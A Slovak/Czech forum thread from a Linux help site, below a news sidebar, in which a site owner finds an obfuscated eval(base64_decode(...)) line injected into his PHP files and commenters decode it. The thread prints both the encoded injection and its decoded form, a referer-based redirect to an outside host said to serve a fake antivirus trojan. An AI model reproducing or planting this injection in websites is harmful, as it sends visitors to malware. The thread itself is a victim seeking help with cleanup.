Inzerujte na AbcPráce.cz od 950 Kč

napište » Zprávičky

GIMP 3.2 RC3

dnes 04:33 | Nová verze

Byla vydána (Mastodon, 𝕏) třetí RC verze GIMPu 3.2. Přehled novinek v oznámení o vydání. Podrobně v souboru NEWS na GitLabu.

Ladislav Hagara | Komentářů: 0

iPhone 17e a iPad Air s čipem M4

včera 21:44 | IT novinky

Apple představil iPhone 17e a iPad Air s čipem M4.

Ladislav Hagara | Komentářů: 1

Gram 1.0

včera 21:11 | Zajímavý software

Byla vydána verze 1.0 editoru kódů Gram. Jedná se o fork editoru Zed bez telemetrie a umělé inteligence.

Ladislav Hagara | Komentářů: 0

Oznámena spolupráce GrapheneOS s Motorolou

včera 20:33 | IT novinky

Byla oznámena spolupráce GrapheneOS s Motorolou. Podrobnosti v tiskové zprávě. GrapheneOS (Wikpedie) je varianta Androidu zaměřující se na bezpečnost a soukromí.

Ladislav Hagara | Komentářů: 0

Armbian 26.2.1

včera 02:22 | Nová verze

Armbian, tj. linuxová distribuce založená na Debianu a Ubuntu optimalizovaná pro jednodeskové počítače na platformě ARM a RISC-V, ke stažení ale také pro Intel a AMD, byl vydán ve verzi 26.2.1. Přehled novinek v Changelogu.

Ladislav Hagara | Komentářů: 0

Začaly volby do Rady openSUSE

včera 02:11 | Komunita

Volí se dvě místa v Radě openSUSE. Seznamte se se čtyřmi kandidáty. Členové projektu openSUSE mohou hlasovat od 1. do 8. března. Výsledky budou oznámeny 9. března.

lkocman | Komentářů: 1

OpenAI uzavřela dohodu s Pentagonem

1.3. 19:22 | IT novinky

Společnost OpenAI uzavřela dohodu s americkým ministerstvem obrany o poskytování technologií umělé inteligence (AI) pro utajované sítě americké armády. Firma to oznámila několik hodin poté, co prezident Donald Trump nařídil vládě, aby přestala využívat služby společnosti Anthropic.

Ladislav Hagara | Komentářů: 11

Pentagon označil Anthropic za bezpečnostní riziko

1.3. 13:33 | IT novinky

Technologická společnost Anthropic v noci na dnešek oznámila, že se obrátí na soud kvůli rozhodnutí ministerstva obrany označit ji za bezpečnostní riziko dodavatelského řetězce poté, co nevyhověla jeho požadavkům týkajícím se používání umělé inteligence (AI). Prezident Donald Trump krátce před tím uvedl, že nařídil federálním úřadům postupně ukončit využívání jejích AI technologií. Spor mezi firmou vyvíjející chatbot Claude a

… více »

Ladislav Hagara | Komentářů: 13

Zemřel Rob Grant, spolutvůrce kultovního sci-fi seriálu Červený trpaslík

28.2. 15:44 | Upozornění

Zemřel Rob Grant, spolutvůrce kultovního sci-fi seriálu Červený trpaslík.

Ladislav Hagara | Komentářů: 8

iPhone a iPad získávají certifikaci pro práci s utajovanými informacemi NATO

27.2. 17:33 | IT novinky

Apple oznámil, že iPhone a iPad jako první a jediná zařízení pro koncové uživatele splňují požadavky členských států NATO na zabezpečení informací. Díky tomu je možné je používat pro práci s utajovanými informacemi až do stupně „NATO Restricted“, a to bez nutnosti instalovat speciální software nebo měnit nastavení. Žádné jiné běžně dostupné mobilní zařízení tak vysokou úroveň státní certifikace dosud nezískalo.

Ladislav Hagara | Komentářů: 20

Centrum | Napsat | Starší

navrhněte » Anketa

Komentářů: 25, poslední 3.2. 19:50

Rozcestník

AbcLinuxu

HDmag.cz

AbcLinuxu:/ Poradna / Linuxová poradna / Napadnuté weby

Štítky: data, download, PHP, programování

Dotaz: Napadnuté weby

9.5.2011 12:26 dusan
Napadnuté weby

Přečteno: 562×

Odpovědět | Admin

Zdravím.

Na stránkach s príponov php, na mojom servery, mám na mnohých weboch tento kód:

eval(base64_decode("DQoNCg0KZXJyb3JfcmVwb3J0aW5nKDApOw0KJG5jY3Y9aGVhZGVyc19zZW50KCk7DQppZiAoISRuY2N2KXsNCiRyZWZlcm
VyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YT0kX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107DQppZiAoc3RyaXN0cigkcmVmZXJlciwi
dHdpdHRlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29vZ2xlIikgb3Igc3RyaXN0cigkcmVmZX
JlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFzay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJtc24iKSBvciBzdHJpc3RyKCRyZWZl
cmVyLCJsaXZlIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2siKSkgew0KCWlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3
RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7CQkNCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL3Jpbmdvc3RhcnQub3NhLnBsLyIpOw0KCQlleGl0
KCk7DQoJfQ0KfQ0KfQ=="));

Po prekódovaní z BASE64 to je:

Binary data detected! Click 'DOWNLOAD BINARY FILE NOW' button to download file.

WARNING!!!!
===========
Be careful what you download. If the file contains a virus, you will infect your machine!!
HIT 'BACK' when done.

Predpokladám, že mám zavírené stránky. Neviete čo to je, a ako tomu predchádzať? Poprípade existuje nejaký antivír, ktorý to dokáže odvíriť? V napadnutých doménach sa to nachádza skoro v každom php súbore.

Nástroje: Začni sledovat (0) ?

Odpovědi

9.5.2011 12:31 dusan
Rozbalit Rozbalit vše Re: Napadnuté weby

A ešte jedna vec, čo som si všimol: Zmenené súbory majú pôvodný dátum a čas.

9.5.2011 12:33 Stanislav Petr | skóre: 27 | Praha
Rozbalit Rozbalit vše Re: Napadnuté weby

Obecne informace jak postupovat najdete napriklad v napovede tady: http://www.hosting90.cz/cz/napoveda-jak-postupovat-pri-napadeni-stranek-skodlivym-kodem

Jako dalsi praventivni krok, pokud se jedna o server ktery slouzi pro zakazniky doplnit FTP server o antivir. Dobry zkusenosti mam s proftpd + mod_clamav (http://www.thrallingpenguin.com/resources/mod_clamav.htm)

Obvykle k tomuhle dochazi pomoci nahrani prez FTP kdy utocnik hesla nejcasteji ziskava z ulozenych udaju prave v aplikaci Total Commander.

No jo... Co bych cekal od systemu, kterej se vypina tlacitkem start... http://glux.org

9.5.2011 12:48 dusan
Rozbalit Rozbalit vše Re: Napadnuté weby

Dík za info.

Ešte by ma zaujímalo, či existuje nejaký antivir ktorý by som mohol púšťať v crone, a ktorí by preskenoval vsetky domeny.

Ten kód mi nedáva zmysel. Je to len čistý text, žiadna php funkcia. Potrebujem tie stránky opraviť. Bohužiaľ sa mi weby zálohujú každý deň posledných 7 dní, MySQL posledný mesiac. Vo vecsine su zavirene aj v zalohach. Nechcem to robiť rucne, lebo ich mozem pokazit.

9.5.2011 12:53 Jakub Lucký | skóre: 40 | Praha
Rozbalit Rozbalit vše Re: Napadnuté weby

Po překódování z base64 mi vyšlo tohle:

error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"twitter") or stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing") or stristr($referer,"ask.com") or stristr($referer,"msn") or stristr($referer,"live") or stristr($referer,"facebook")) {
	if (!stristr($referer,"cache") or !stristr($referer,"inurl")){		
		header("Location: http://ringostart.osa.pl/");
		exit();
	}
}
}

If you understand, things are just as they are; if you do not understand, things are just as they are.

9.5.2011 12:57 dusan
Rozbalit Rozbalit vše Re: Napadnuté weby

Kurva !!!

Nie som PHP programator, čo tým autor zamýšlal?

9.5.2011 13:29 Kit
Rozbalit Rozbalit vše Re: Napadnuté weby

Zkusil jsem si dát URL do browseru. Mít Windows, tak bych určitě moc klidný nebyl. Provede virtuální antivirový test a snaží se stáhnout "antivirák", tedy trojského koně.

9.5.2011 15:22 Der Teufel
Rozbalit Rozbalit vše Re: Napadnuté weby

Tenhle malware znám, odstraňoval jsem ho z několika počítačů. Hodně odolná svině. Stáhne "antimalware", který pak spouští při každém pokusu o načtení jakékoliv webové stránky, docela znepříjemní další brouzdání po netu (ukazuje furt svou webovou stránku s varováním že kvůli bezpečnosti zablokoval načítání). Samotní antimalware samozřejmě požaduje zaplacení plné verze pro odstranění "nalezených" malware a vypadá velice dobře, skvěle zapadá do systému.

9.5.2011 13:17 NN
Rozbalit Rozbalit vše Re: Napadnuté weby

V klidu je to jen presmerovani na nejakou sracku..

9.5.2011 14:44 tomvec | skóre: 24 | Kojetín
Rozbalit Rozbalit vše Re: Napadnuté weby

Ale co chudáci Widlí, co to sežerou i navijákem?

Založit nové vlákno • Nahoru

Tiskni Sdílej: